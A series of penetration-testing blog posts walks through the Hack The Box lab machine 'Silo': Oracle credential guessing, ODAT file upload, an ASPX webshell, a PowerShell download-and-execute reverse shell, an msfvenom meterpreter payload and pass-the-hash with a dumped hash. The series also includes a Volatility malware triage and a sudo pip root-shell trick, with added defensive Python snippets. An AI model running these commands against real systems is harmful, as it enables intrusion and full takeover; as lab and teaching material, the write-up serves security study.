Pentest 5 : [htb] Silo, Privilege Escalation

Hi Everyone,

I am going to continue with the next phase of the Silo box tutorial. In this part we are going to do privilege escalation.

The interesting thing in this tutorial is that we will not exploit a Windows vulnerability to gain privileges; instead we will examine a memory dump.

Let's start checking it.

We explore the Windows directory and visit each user's home directory. In the home directory of user Phineas I finally found something interesting: a note with a URL to a memory dump of this server, taken because of an Oracle issue.

Let's download it. Oops, it requires a password. Let's try the password the note gives us. Arrgh, password incorrect.

I found that this was caused by an encoding problem in PowerShell. So what we need to do is transfer the note to our Linux box using Base64 encoding.

Let's do it.

PS C:\users\Phineas\Desktop> $myFile = Get-Content "Oracle Issue.txt"
PS C:\users\Phineas\Desktop> $fe = [System.Text.Encoding]::UTF8.GetBytes($myFile)
PS C:\users\Phineas\Desktop> [System.Convert]::ToBase64String($fe)

U3VwcG9ydCB2ZW5kb3IgZW5nYWdlZCB0byB0cm91Ymxlc2hvb3QgV2luZG93cyAvIE9yYWNsZSBwZXJmb3JtYW5jZSBpc3N1ZSAoZnVsbCBtZW1vcnkgZHVtcCByZXF1ZXN0ZWQpOiAgRHJvcGJveCBsaW5rIHByb3ZpZGVkIHRvIHZlbmRvciAoYW5kIHBhc3N3b3JkIHVuZGVyIHNlcGFyYXRlIGNvdmVyKS4gIERyb3Bib3ggbGluayAgaHR0cHM6Ly93d3cuZHJvcGJveC5jb20vc2gvNjlza3J5emZzemI3ZWxxL0FBRFpuUUViYnFEb0lmNUwyZDBQQnhFTmE/ZGw9MCAgbGluayBwYXNzd29yZDogwqMlSG04NjQ2dUMk

Then you can decode it on Linux with this command:

echo "U3VwcG9ydCB2ZW5kb3I …" | base64 -d

Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested): Dropbox link provided to vendor (and password
under separate cover). Dropbox link https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0 link password: £%Hm8646uC$

We can see that the password is now properly decoded. We can now go forward and download the memory dump.
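The same round trip in Python, as an added example that is not part of the original post: it decodes the Base64 note produced above, pulls out the password, and shows what a UTF-8 pound sign turns into when the bytes are read with a legacy single-byte Windows code page (cp1252 is my assumption here, used only to illustrate the kind of mismatch described above).

```python
import base64

# Base64 text produced by the PowerShell commands in the post (copied from there,
# wrapped here only for readability).
NOTE_B64 = (
    "U3VwcG9ydCB2ZW5kb3IgZW5nYWdlZCB0byB0cm91Ymxlc2hvb3QgV2luZG93"
    "cyAvIE9yYWNsZSBwZXJmb3JtYW5jZSBpc3N1ZSAoZnVsbCBtZW1vcnkgZHVt"
    "cCByZXF1ZXN0ZWQpOiAgRHJvcGJveCBsaW5rIHByb3ZpZGVkIHRvIHZlbmRv"
    "ciAoYW5kIHBhc3N3b3JkIHVuZGVyIHNlcGFyYXRlIGNvdmVyKS4gIERyb3Bi"
    "b3ggbGluayAgaHR0cHM6Ly93d3cuZHJvcGJveC5jb20vc2gvNjlza3J5emZz"
    "emI3ZWxxL0FBRFpuUUViYnFEb0lmNUwyZDBQQnhFTmE/ZGw9MCAgbGluayBw"
    "YXNzd29yZDogwqMlSG04NjQ2dUMk"
)


def decode_note(b64_text):
    """Decode the Base64 transfer and interpret the raw bytes as UTF-8.

    Base64 carries the file's bytes unchanged, so whatever the Windows console
    did when *displaying* the non-ASCII character does not affect what we
    recover here. utf-8-sig also drops a BOM if a Windows editor added one.
    """
    raw = base64.b64decode(b64_text, validate=True)
    return raw.decode("utf-8-sig").strip()


def extract_password(note, marker="link password:"):
    """Return the text after the marker (the note ends with the password)."""
    idx = note.rfind(marker)
    if idx < 0:
        raise ValueError("password marker not found in note")
    return note[idx + len(marker):].strip()


def as_wrong_codepage(text, codepage="cp1252"):
    """Constructed illustration: UTF-8 bytes read with a single-byte code page.
    Every non-ASCII character (here the pound sign, bytes C2 A3) becomes two
    wrong characters, which is why a copied password stops matching."""
    return text.encode("utf-8").decode(codepage, errors="replace")


if __name__ == "__main__":
    note = decode_note(NOTE_B64)
    pw = extract_password(note)
    print("decoded password :", pw)
    print("misread as cp1252:", as_wrong_codepage(pw))
```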

The next thing to do is to examine the memory dump we downloaded, using Volatility. The first step is to check its profile:

volatility -f SILO-20180105-221806.dmp imageinfo

imageinfo reports several candidates for the profile:

Suggested Profile(s) : Win8SP0x64, Win10x64_17134, Win81U1x64, Win10x64_14393, Win2012R2x64_18340, Win2012R2x64, Win10x64_10586, Win10x64, Win2016x64_14393, Win10x64_16299, Win10x64_10240_17770, Win2012x64, Win8SP1x64_18340, Win8SP1x64, Win10x64_15063 (Instantiated with Win10x64_15063)

We select the profile Win2012R2x64 because we know that the target OS is a server. Once we have the profile we can start digging for information that remained in memory at the time of the dump. The dump was created by a crash (a blue screen), so I assume a user was logged in at that moment, and we can check whether that user's hash was left in memory. You can use this command to check it:

volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump

Wow, we get some hashes. All right, the next step is to check whether we can use the pass-the-hash attack technique to execute cmd on the server, using the command below. You can read about the pass-the-hash attack at this URL:

https://www.beyondtrust.com/resources/glossary/pass-the-hash-pth-attack

pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.10.10.82 cmd

Yeah, we now have a command prompt on the server at administrator level.

All right. That's it for this alternative technique to elevate privileges.

Pentest 4 : [htb] Silo, Reverse Shell

Hi there,

I am going to write about the reverse shell, the next step after we have uploaded the RCE web page to the server.

The question is why we should get a reverse shell when we can already execute commands remotely on the server. The answer is simply to get more flexibility for the next steps, such as privilege escalation or finding information on the server.

Let's start this process. As I mentioned in the previous post, I am going to use the Nishang PowerShell framework for the reverse shell. I chose Nishang because of its simplicity.

Nishang is an open source framework and collection of powerful PowerShell scripts and payloads that you can use during penetration testing audit, post exploitation phase or other stages of offensive security auditing. Nishang is useful during various phases of a security auditing process and has many scripts categorized into logical categories such as information gathering, scanning, privilege elevation etc. [https://n0where.net/powershell-penetration-testing-framework-nishang]

You can find the detail description of this framework at https://n0where.net/powershell-penetration-testing-framework-nishang

There are two ways of getting Nishang: if you use Kali Linux it is available at /usr/share/nishang, or you can download it from GitHub at https://github.com/samratashok/nishang

drwxr-xr-x 2 root root 4096 Sep 20 12:34 ActiveDirectory
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Antak-WebShell
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Backdoors
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Bypass
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Client
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Escalation
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Execution
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Gather
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Misc
drwxr-xr-x 2 root root 4096 Sep 20 12:34 MITM
-rw-r--r-- 1 root root 929 Nov 12 2017 nishang.psm1
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Pivot
drwxr-xr-x 2 root root 4096 Sep 20 12:34 powerpreter
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Prasadhak
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Scan
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Shells
drwxr-xr-x 2 root root 4096 Sep 20 12:34 Utility

There are a lot of PowerShell scripts you can use, as the listing above shows. I am going to use Invoke-PowerShellTcp.ps1, which is available in the Shells directory.

root@dragon:/usr/share/nishang/Shells# cat Invoke-PowerShellTcp.ps1
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.

.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
Also, a standard netcat can connect to this script Bind to a specific port.

The script is derived from Powerfun written by Ben Turner & Dave Hardy

.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.

.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on the given IP and port.

.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 4444

Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port.

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444

There are many types of reverse shell that can be made; I pick Invoke-PowerShellTcp to create a TCP reverse shell. You can also use Bind, but its limitation is that we have to initiate the connection to the server to get the shell, and it is certainly easier for the Blue team to detect because there would be inbound connections to the server on a port that is not common.

Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Change the IPAddress to your own computer's IP address and the port to a number you like. To use the script, append the line above at the very bottom of the file, just like this: https://github.com/rioasmara/wordpress/blob/master/rev.ps1

Now, the next step is to deliver this PowerShell script to the server using the remote command execution we already have on the server.

There are three things you should prepare for this action:

  1. Prepare a local web server so the remote server can download rev.ps1; you can use Python to create an HTTP server with the command python -m SimpleHTTPServer 80
  2. Create an nc listener to receive the reverse shell connection initiated by our rev.ps1 PowerShell script, using the command nc -nlvp 9001. The port 9001 must match the one you specified in the Nishang Invoke-PowerShellTcp.ps1 line
  3. Invoke the PowerShell download-and-execute using the remote command execution from the web:
    powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.73/rev.ps1')"

Here are the three steps above:

Boom, we are now connected with the reverse shell. We execute the command from step 3 in the web shell to download our rev.ps1 file to the server and immediately invoke the TCP reverse shell that connects back to our nc listener. You can now interact directly with the server shell, as in the image below.
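From the defender's side, the download cradle in step 3 and an outbound connection to an arbitrary listener port are exactly what the Blue team mentioned above would look for. The following added example (not code from the post or from Nishang) runs both checks over constructed log lines; the "type|pid|payload" layout is my own simplification of PowerShell script block logging and a connection log, not a real event format.

```python
import re

# Constructed sample events (not real logs from the box). Layout is assumed:
# "<type>|<pid>|<payload>". Type "PS" carries a PowerShell script block text,
# type "NET" carries "srcip:srcport->dstip:dstport".
SAMPLE_EVENTS = [
    "PS|4012|Get-ChildItem C:\\inetpub\\wwwroot",
    "PS|4013|powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.73/rev.ps1')\"",
    "PS|4013|Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.73 -Port 9001",
    "NET|4013|10.10.10.82:49731->10.10.14.73:9001",
    "NET|1234|10.10.10.82:49732->10.10.10.5:443",
    "PS|4020|Get-Service | Where-Object Status -eq Running",
]

# Download-and-execute cradle: an in-memory invoke (IEX / Invoke-Expression)
# combined with a web fetch in the same script block.
CRADLE_RE = re.compile(
    r"(?i)(IEX|Invoke-Expression)[\s(]*.*"
    r"(Net\.WebClient|DownloadString|Invoke-WebRequest|\biwr\b)"
)

# Destination ports that are expected for this server; anything else from a
# process that also ran PowerShell is the "uncommon port" signal from the post.
COMMON_PORTS = {53, 80, 443, 445, 135, 139, 3389}


def flag_cradles(events):
    """Return (pid, script_text) for script blocks matching the cradle pattern."""
    hits = []
    for ev in events:
        kind, pid, payload = ev.split("|", 2)
        if kind == "PS" and CRADLE_RE.search(payload):
            hits.append((int(pid), payload))
    return hits


def flag_uncommon_outbound(events, common=COMMON_PORTS):
    """Return (pid, dst_ip, dst_port) for outbound connections to ports not in
    the allow-list."""
    hits = []
    for ev in events:
        kind, pid, payload = ev.split("|", 2)
        if kind != "NET":
            continue
        _src, dst = payload.split("->")
        ip, port = dst.rsplit(":", 1)
        if int(port) not in common:
            hits.append((int(pid), ip, int(port)))
    return hits


def correlate(events):
    """PIDs that both ran a cradle and opened an uncommon outbound connection,
    a much stronger signal than either observation on its own."""
    cradle_pids = {pid for pid, _ in flag_cradles(events)}
    net_pids = {pid for pid, _, _ in flag_uncommon_outbound(events)}
    return sorted(cradle_pids & net_pids)


if __name__ == "__main__":
    for pid, text in flag_cradles(SAMPLE_EVENTS):
        print("cradle   pid", pid, ":", text)
    for pid, ip, port in flag_uncommon_outbound(SAMPLE_EVENTS):
        print("outbound pid", pid, "->", f"{ip}:{port}")
    print("correlated PIDs:", correlate(SAMPLE_EVENTS))
```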

I will post about the privilege escalation process next. Meanwhile you can use the shell to explore the server and do enumeration.

Pentest 3 : [htb] Silo, Oracle for Remote Command Execution

Hi Everyone,

Today I am going to continue the Oracle exploitation of the Silo box from Hack The Box. I am going to write about another exploitation technique that involves some manual work, such as crafting an Oracle query to write a file and then accessing the file through the web server that is available on the box.

The plan for this exploitation is to use the SQL read/write file functions to upload our RCE capability as an .aspx file that can be invoked through the web server running on the box.

First we need to be able to connect to the Oracle server, which we can since we successfully brute-forced the username and password. We can connect using sqlplus, which can be downloaded and installed from the Oracle website. You can connect to the Oracle server using the command below:

sqlplus64 scott/tiger@10.10.10.82:1521/XE

After you are connected you can check the privileges given to the user; you need file operation privileges to do the exploitation. You can query the user's privileges with the command below:

SQL> select * from session_privs;

Oops, we can see that our session does not have the read and write file privilege, so how do we do the exploitation? Relax, it is because our connection is not running as DBA, so let's add the as sysdba parameter like the command below.

sqlplus64 scott/tiger@10.10.10.82:1521/XE as sysdba

Now we have many more privileges, and we can try to read some files on the destination server. Let's try to access the default HTML file in wwwroot:

set serveroutput on   -- needed in sqlplus so the dbms_output text is displayed
declare
  f utl_file.file_type;
  s varchar(400);
begin
  -- open the file read-only from the IIS web root and print its first line
  f := utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm', 'R');
  utl_file.get_line(f, s);
  utl_file.fclose(f);
  dbms_output.put_line(s);
end;
/

Yeah, the magic is there: we can read iisstart.htm in the wwwroot directory. So the plan is to write a file that provides remote command execution and can be executed from a web browser.

First we need to prepare the web page that provides remote command execution based on ASP. If you are using Kali Linux it is easy to find a sample in your installation; just type locate webshell

/usr/share/webshells/asp/cmdasp.aspx

Kali Linux has a lot of webshells for various technologies such as ASP, ASPX, PHP and Java. You can pick the one that suits your need. I pick cmdasp.aspx because our destination is an IIS environment.

Since we are going to deliver our exploit inside a SQL command, it should be optimized, because a SQL command has a length limit. You can count the characters in the file using cat and wc; here is the command:

cat cmdasp.aspx | wc -c
1028

I think 1028 is quite OK. Do not optimize too much, or your exploit will not work when invoked.

Below is the modified cmdasp.aspx: https://github.com/rioasmara/wordpress/blob/master/cmdasp.aspx

The next step is to prepare the SQL command that sends the exploit. Because cmdasp.aspx is a web page containing newlines (\n), we need to put all the code on one line so that it fits in the SQL command.

Here is how to convert the file to a one-line string:

sed -z 's/\n//g' cmdasp.aspx

You can download this one-line code from my GitHub: https://github.com/rioasmara/wordpress/blob/master/cmdasp-online.txt

Now create the SQL query that delivers the exploit. The next step is to copy this exploit into the SQL query and execute it: https://github.com/rioasmara/wordpress/blob/master/exploit.write

With the above command we create a hello.aspx file whose content is the exploit we prepared. Now you can invoke the file by calling it from the browser, because we wrote hello.aspx into the wwwroot directory on the server. With this file in place we can do remote command execution, as you can see in the picture below.
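Seen from the server, what happened above is that a database account wrote a new .aspx file into the web root. A baseline comparison of the web root catches exactly that; the added example below (not from the post) builds such a baseline and checks it against a constructed temporary directory where a hello.aspx appears.

```python
import hashlib
import os
import tempfile

# Extensions that IIS executes server-side; a new or changed file with one of
# these in the web root deserves immediate attention.
EXECUTABLE_EXT = (".aspx", ".asp", ".ashx", ".asmx", ".config")


def snapshot(root):
    """Map each file under root (relative POSIX-style path) to its SHA-256."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                result[rel] = hashlib.sha256(fh.read()).hexdigest()
    return result


def diff_snapshots(baseline, current):
    """Classify changes since the baseline and single out the risky ones."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    risky = [p for p in added + modified if p.lower().endswith(EXECUTABLE_EXT)]
    return {"added": added, "removed": removed, "modified": modified, "risky": risky}


def demo():
    """Constructed scenario in a temp dir: a web root holding the IIS default
    page, then a hello.aspx appears (the file name used in the post) and the
    default page is edited. Returns the diff against the baseline."""
    with tempfile.TemporaryDirectory() as wwwroot:
        with open(os.path.join(wwwroot, "iisstart.htm"), "w") as fh:
            fh.write("<html>IIS default page</html>")
        baseline = snapshot(wwwroot)
        with open(os.path.join(wwwroot, "hello.aspx"), "w") as fh:
            fh.write("<!-- constructed placeholder content, not a webshell -->")
        with open(os.path.join(wwwroot, "iisstart.htm"), "a") as fh:
            fh.write("<!-- edited -->")
        return diff_snapshots(baseline, snapshot(wwwroot))


if __name__ == "__main__":
    print(demo())
```

On a real server you would store the baseline (for example as JSON) after deployment and run the comparison on a schedule, alerting on the "risky" list.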

Now that remote command execution is available, we can leverage our access to get more flexibility by taking over a shell on the server. One way to get a shell is to use PowerShell to create a reverse shell connection. I suggest using an available framework such as Nishang to minimize manual work in PowerShell. You can download the Nishang framework from GitHub: https://github.com/samratashok/nishang

I will explain the reverse shell in the next post.

Pentest 2 : [htb] Silo, Exploitation Oracle

Hi All,

I would like to continue the last article about hacking Silo, a pentest box from Hack The Box.

The last steps we did were the recon and enumeration phase of the penetration test, so we can now continue with exploitation to gain access to the server.

We have the username and password from the enumeration, so we can continue to exploit the server to gain access.

ODAT has the capability of delivering malware to the system by using Oracle's ability to write a file to the filesystem. Let's first create the payload using msfvenom with the command below:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.73 lport=4545 -f exe > rio.exe

Let's deliver the payload to the server using ODAT's utlfile functionality. The command looks as below:

./odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ rio.exe rio.exe

Okay, we have successfully delivered our payload to the server using the Oracle write-file function; the malware is at C:/rio.exe.

Now we can invoke the payload using Oracle's ability to load an external table to run an executable. But before we execute it, let's create the reverse handler using the Metasploit multi/handler.

After we have created the reverse handler we can invoke the payload on the remote server. We can use the ODAT command below:

./odat.py externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba c:/ rio.exe

After ODAT has successfully executed the remote payload we can check the reverse handler in Metasploit; there should be one session created, like in the image below.

We can now start interacting with the established session using this command:

sessions -i 1 (1 is the session id)

Meterpreter provides a lot of post-exploitation functionality; just type help in the Meterpreter session.

For example, we can check who we are on the target system with the command below:

meterpreter > getuid

We can see from the above picture that we are the highest-privileged account on the server. You can also query the list of privileges you have with this command:

meterpreter > getprivs

OK, that is all about the lab. Finally we hacked the server and got the highest privilege. In the next post I will show another technique that involves a bit more manual work but is also effective for some exploitation scenarios.

Pentest 1 : [htb] Silo, Hack Oracle

Hi everyone,

Today I am going to write a little walk-through of a box from the Hack The Box lab. I am going to explain step by step the box called Silo.

Overall the walk-through is divided into three phases: hacking the Oracle database, web exploitation, and privilege escalation.

Let's start. As usual we should do recon. The best tool for recon is nmap. You can use the command below:

nmap -sS -sV -sC -vvv 10.10.10.82
-sS = SYN scan
-sC = banner grabbing
-sV = check the version of target service
-vvv = be verbose

http open port 80
oracle server port 1521

We can see that there is an open port for Oracle Database 11.2 and port 80 for HTTP. We have two attack surfaces that can be used for exploitation. I will use an application called ODAT (Oracle Database Attacking Tool) to help me analyze the Oracle database service. This tool can be downloaded from https://github.com/quentinhardy/odat

First let's brute force the SIDs available on the server. We use the command below:

./odat.py sidguesser -s 10.10.10.82 -p 1521

We found two database instances, XE and XEXDB. The next step is to brute force the username and password. We can use ODAT for that with the command below:

./odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE

But do not forget to provide the username and password wordlist in the accounts directory within the ODAT directory. The entries must be formatted as username/password, just like below.

We finally found the username and password of the XE instance; here is the picture:

The username is scott and the password is tiger.

OK, that is all about the recon and enumeration phase of the penetration test cycle. I will continue with the exploitation phase in the next blog post.

Basic : Extracting Malware from memory

Hi All,

I would like to share some basic information about extracting malware from a memory dump using a powerful application called Volatility. I call it basic knowledge because I want to give you some ideas on how to analyze things in memory. There are, however, many other applications that can help you investigate running applications in memory in real time, such as CrowdStrike Falcon, which enables detailed memory forensics and can visualize events as a network graph.

In this tutorial the scenario is that we have malware on a Windows XP host that runs silently, infects the host and starts connecting back to its CnC server. You can download the memory dump for this exercise from http://files.sempersecurus.org/dumps/cridex_memdump.zip

First of all, you must have Volatility installed. I am using Kali Linux for this, but you can also install it with the steps below (I took the picture from the internet):

install volatility

OK, now Volatility is ready. You can start analyzing the memory dump file you downloaded, but do not forget to unzip it first.

As you know, information in memory is laid out differently depending on the operating system. So the first step is to find the suitable profile for the memory dump we want to analyze. We can use the command:

volatility -f cridex.vmem imageinfo

plugin imageinfo

We can see from the information above that Volatility suggests the profile WinXPSP2x86 or WinXPSP3x86. We can now drill down further in our malware hunt.

The next step is to find out which applications were running at the time the dump was taken. We can use the command:

volatility --profile WinXPSP2x86 -f cridex.vmem pstree

plugin pstree

Another way to find out which applications were running is this command:

volatility --profile WinXPSP2x86 -f cridex.vmem pslist

plugin pslist

From the process list above we can see a suspicious process, PID 1640 reader_sl.exe, whose parent process is explorer.exe PID 1484, which means reader_sl.exe was started by the Explorer application.

It is also important to check for processes that try to hide themselves from the task list. You can use psxview for this. If you see any process that is False in the pslist and psscan columns, you can assume it is the malware.

volatility --profile WinXPSP2x86 -f cridex.vmem psxview

plugin psxview

The next thing to check is connection events. Malware usually connects back to its CnC (Command and Control) to receive its next task or to send back whatever information it has extracted from the host. We can use the command below to scan for connections:

volatility --profile WinXPSP2x86 -f cridex.vmem connscan

plugin connscan

We can see that PID 1484 established connections to the internet IPs 41.168.5.140 port 8080 and 125.19.103.198 port 8080, which we do not recognize.

We can also check the connections further with the sockets plugin to analyze which connections are in the Listening state. You can use the command below:

volatility --profile WinXPSP2x86 -f cridex.vmem sockets

plugin socket

From the picture above we can also see that PID 1484 (explorer, the parent of reader_sl.exe) is actually waiting for TCP connections, accepting from any IP.
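The pslist, psscan, psxview and connscan steps above, combined in code as an added example that is not from the post: the records below are constructed to mirror the PIDs, names and CnC addresses the post reports (the remaining processes and the hidden entry are filler I made up), and the record layout is my own rather than Volatility's exact output.

```python
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid name")
Conn = namedtuple("Conn", "pid remote_ip remote_port")

# Constructed process records shaped after pslist. PIDs 1484/1640 and their
# names are the ones the post reports; the other entries are made-up filler.
PSLIST = [
    Proc(4, 0, "System"),
    Proc(368, 4, "smss.exe"),
    Proc(584, 368, "services.exe"),
    Proc(1056, 584, "svchost.exe"),
    Proc(1484, 1464, "explorer.exe"),
    Proc(1640, 1484, "reader_sl.exe"),
]
# psscan carves _EPROCESS structures out of memory instead of walking the
# kernel's process list, so a process unlinked by a rootkit shows up here but
# not in pslist. Constructed: one extra hidden entry to exercise the check.
PSSCAN = PSLIST + [Proc(2020, 1484, "hidden.exe")]

# Constructed connections mirroring the connscan results discussed above.
CONNSCAN = [
    Conn(1484, "41.168.5.140", 8080),
    Conn(1484, "125.19.103.198", 8080),
    Conn(1056, "10.0.0.1", 53),
]


def hidden_processes(pslist, psscan):
    """psxview-style cross view: processes the scanner found but the list lacks."""
    listed = {p.pid for p in pslist}
    return [p for p in psscan if p.pid not in listed]


def ancestry(pid, procs):
    """Parent chain for pid as names, child first; stops at an unknown PID."""
    by_pid = {p.pid: p for p in procs}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].name)
        pid = by_pid[pid].ppid
    return chain


def children_of(pid, procs):
    """Names of processes whose parent is pid (reader_sl.exe under explorer)."""
    return [p.name for p in procs if p.ppid == pid]


def suspicious_connections(conns, procs, trusted_ports=(53, 80, 443)):
    """Connections on non-trusted ports, each tagged with the owning process
    chain and that process's children. explorer.exe talking to external hosts
    on 8080 while parenting reader_sl.exe is the oddity the post walks through."""
    out = []
    for c in conns:
        if c.remote_port in trusted_ports:
            continue
        out.append({
            "pid": c.pid,
            "remote": f"{c.remote_ip}:{c.remote_port}",
            "chain": ancestry(c.pid, procs),
            "children": children_of(c.pid, procs),
        })
    return out


if __name__ == "__main__":
    print("hidden:", [p.name for p in hidden_processes(PSLIST, PSSCAN)])
    for s in suspicious_connections(CONNSCAN, PSSCAN):
        print(s)
```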

The next step is to analyze how an application was started on the command line, and with what parameters and path. We can use the command below:

volatility --profile WinXPSP2x86 -f cridex.vmem cmdline

plugin cmdline

We can see that reader_sl.exe, which we suspect to be the malware, is actually installed at "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe" and was started without any parameters. Compare this with an application that was started with parameters, such as Command line : C:\WINDOWS\system32\svchost.exe -k LocalService

The next step is to analyze the binary of Reader_sl.exe. We can extract that specific binary from the memory dump using this command:

volatility --profile WinXPSP2x86 -f cridex.vmem procdump -p 1640 --dump-dir .

plugin procdump

With the above command Volatility extracts the binary from memory and names it executable.1640.exe. With this binary you can start analyzing it; you can upload it to virustotal.com to check what kind of malware it is.

We can now conclude that the binary is malware, so the first question of malware triage, whether malware is present, is answered. But do not stop here; malware triage does not end at this point. You should find out what the malware is trying to do, what its objective is, how it installed itself on the host, and how it got onto your premises.

The next thing to do is to dump the memory area used by the malware, so that we can narrow our search to this particular process only. We can use the command below to extract it:

volatility --profile WinXPSP2x86 -f cridex.vmem memdump -p 1640 --dump-dir .

plugin memdump

OK, now we have the memory dump of the malware process. We know this malware tries to connect to a server, so we need to find out which protocol it uses to connect to the internet (the CnC at 41.168.5.140). We can run strings over the memory dump and search:

strings 1640.dmp | grep -Fi "41.168.5.140" -C 5

strings

So we can conclude that the communication with the CnC uses the HTTP protocol, and from this we know that our perimeter protection was not able to detect the signature. We can see it posting some data to the URL http://41.168.5.140/zb/v_01_a/in/

Let's search for zb/v_01_a/in/ and see what we find.

strings 1640.dmp | grep -Fi "zb/v_01_a/in/" -C 5

strings

Ohhh, we found another CnC IP: 188.40.0.138 at port 8080.

Let's drill further into the memory; perhaps we can find some more information:

strings 1640.dmp | less

We can see that this malware has a collection of domains that it tries to infect.

So we can conclude our malware triage points as below:

  1. Does the malware exist within our perimeter? Yes, the malware exists within our perimeter.
  2. How did this malware get into the perimeter? It exploits the PDF reader installation, so there is a high possibility that a non-updated PDF reader was exploited via a phishing campaign.
  3. What is the objective of this malware? It is leaking data.

OK, that is all for today. I will do a detailed analysis of this malware using static and dynamic analysis with IDA.

Little mistake that kills

Hi All,

Today I am writing about a small mistake that system admins might make when configuring their Linux systems.

As usual, after the admin configures the system they give certain privileges to users to run certain commands as admin, which we call sudo. But sometimes the admin is not really careful: in order to stop the users bugging them too much, they just enable anything the user needs without any security risk analysis.

There are a lot of sudo permissions that simply cannot be given to a user, because with that command the user can escalate to a level that endangers the system.

Below is one command that is dangerous to give to a user via sudo:

(root) /usr/bin/pip install *

The above command is the installation manager for Python packages; it is usually given by the admin so that developer users can install additional Python packages. So what is the deal? With that command granted, the user can use sudo pip <malicious_command> to escalate privileges by installing a malicious script.
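The rule quoted above can be spotted before anyone abuses it. As an added example (not part of the post), here is a small sudoers audit in Python that flags rules granting a package installer, or any command with a wildcard argument, to run as root; the sample rules are constructed and the pip rule is the one quoted above.

```python
import re

# Constructed sudoers lines; the pip rule is the one quoted in the post.
SAMPLE_SUDOERS = """
# User privilege specification
root    ALL=(ALL:ALL) ALL
dev     ALL=(root) /usr/bin/pip install *
ops     ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
dev     ALL=(root) /usr/bin/pip3
audit   ALL=(root) /usr/bin/less /var/log/syslog
"""

# Package installers run code shipped inside the package they install, so
# granting them as root is equivalent to granting a root shell.
INSTALLERS = {"pip", "pip3", "easy_install"}

# user host=(runas) commands   (tags such as NOPASSWD: stay in the command part)
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")
TAG_RE = re.compile(r"^((NOPASSWD|PASSWD|SETENV|NOEXEC):\s*)+")


def parse_rules(text):
    """Return the user-specification rules of a sudoers file as dicts."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append(m.groupdict())
    return rules


def runs_as_root(runas):
    """True if the runas list allows root (ALL includes root)."""
    users = runas.split(":")[0]
    return any(u.strip() in ("root", "ALL") for u in users.split(","))


def audit(text):
    """Return (user, command, reason) for rules that hand over root in practice."""
    findings = []
    for r in parse_rules(text):
        if not runs_as_root(r["runas"]):
            continue
        for cmd in (c.strip() for c in r["cmds"].split(",")):
            cmd = TAG_RE.sub("", cmd)
            parts = cmd.split()
            if not parts or parts[0] == "ALL":
                continue  # 'ALL' is a deliberate full grant, not a mistake
            binary = parts[0].rsplit("/", 1)[-1]
            args = parts[1:]
            if any("*" in a for a in args):
                findings.append((r["user"], cmd, "wildcard in arguments"))
            elif binary in INSTALLERS:
                findings.append((r["user"], cmd, "package installer runs code from the package"))
    return findings


if __name__ == "__main__":
    for user, cmd, reason in audit(SAMPLE_SUDOERS):
        print(f"{user}: {cmd}  <- {reason}")
```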

Let's do the exploitation. Create a Python script called exploit.py in a directory, just like the script below:

import pty
pty.spawn("/bin/bash")  # spawn an interactive shell

and save it.

After that you can run this command in that directory:

sudo pip install .

The pip install will execute exploit.py and run the command in the file, which spawns a shell.

Since the script runs with root privileges, the shell that was just spawned is in the root context.

So... now you have escalated to root.

Easy right..

This kind of mistake is just ridiculous... usually made by a lazy admin. 🙂